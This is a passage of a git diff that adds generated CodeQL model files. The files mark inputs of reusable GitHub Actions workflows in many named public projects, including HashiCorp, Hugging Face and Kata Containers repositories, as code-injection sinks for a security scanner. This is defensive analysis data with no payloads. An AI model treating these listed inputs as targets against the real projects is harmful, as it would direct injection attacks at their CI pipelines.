a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml new file mode 100644 index 00000000000..c5f5fc4b29d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml new file mode 100644 index 00000000000..506dd2b9fee --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml new file mode 100644 index 00000000000..4a81c585259 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.build-version", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.wave-app-name", "code-injection", "generated"] + - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "inputs.working-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml new file mode 100644 index 00000000000..d62c86e1129 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.dry-run", "code-injection", "generated"] + - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml new file mode 100644 index 00000000000..8aedf9000a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "inputs.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml new file mode 100644 index 00000000000..b14f14538b8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.package-names-command", "code-injection", "generated"] + - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "inputs.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml new file mode 100644 index 00000000000..3129cac8979 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "inputs.package", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitUser", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.gitEmail", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.providerFqn", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelConversionsPerDocument", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.parallelFileConversions", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.languages", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.cdktfRegistryDocsVersion", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.files", "code-injection", "generated"] + - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "inputs.maxRunners", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml new file mode 100644 index 00000000000..a23f69909c7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "inputs.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml new file mode 100644 index 00000000000..cd91f58c7ec --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.product-version", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.package-name", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goarch", "code-injection", "generated"] + - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "inputs.goos", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml new file mode 100644 index 00000000000..f9b7785cab9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-max", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.sample-name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-edition", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "inputs.vault-version", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-run-acc-tests-for-path.yml", "*", "inputs.path", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.name", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"] + - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml new file mode 100644 index 00000000000..ad0943c3040 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "inputs.isStableRelease", "code-injection", "generated"] + - ["heroku/cli/.github/workflows/promote.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml new file mode 100644 index 00000000000..e263590260f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"] + - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml new file mode 100644 index 00000000000..00b45b50f88 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml new file mode 100644 index 00000000000..a5f35f3b737 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.windowsBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.bazelBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.iosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.macosBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.androidBuildArgs", "code-injection", "generated"] + - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "inputs.linuxBuildArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml new file mode 100644 index 00000000000..d0559519627 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.package_name", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "inputs.hub_base_path", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.pr_number", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.commit_sha", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.languages", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.version_tag_suffix", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.additional_args", "code-injection", "generated"] + - ["huggingface/doc-builder/.github/workflows/build_pr_documentation.yml", "*", "inputs.repo_owner", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml new file mode 100644 index 00000000000..ec7b51abd8e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.folder_slices", "code-injection", "generated"] + - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "inputs.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml new file mode 100644 index 00000000000..92fd43bda75 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.pull_request_number", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.qt_version", "code-injection", "generated"] + - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "inputs.event_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml new file mode 100644 index 00000000000..ca550e4ddd7 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ibm/sarama/.github/workflows/fvt.yml", "*", "inputs.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml new file mode 100644 index 00000000000..580ac8bef0b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "inputs.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml new file mode 100644 index 00000000000..463536e9693 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "inputs.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml new file mode 100644 index 00000000000..57bf30dc0cc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "inputs.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml new file mode 100644 index 00000000000..b7e49d46e1c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "inputs.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml new file mode 100644 index 00000000000..89257a02fcd --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "inputs._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml new file mode 100644 index 00000000000..a645511766b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml new file mode 100644 index 00000000000..1a7784c9f01 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "inputs.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml new file mode 100644 index 00000000000..ffb7a7d7d10 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml new file mode 100644 index 00000000000..4ae93a83cd8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -0,0 +1,23 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml new file mode 100644 index 00000000000..a63ddd5da67 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml new file mode 100644 index 00000000000..e73d0d81875 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml new file mode 100644 index 00000000000..3a911989874 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.images_tag", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "inputs.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "inputs.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml new file mode 100644 index 00000000000..3c525970ecc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml new file mode 100644 index 00000000000..187b3d2fd0a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "inputs.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml new file mode 100644 index 00000000000..3e11359c6b3 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "inputs.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml new file mode 100644 index 00000000000..50bbdaf8153 --- /dev/null +++ 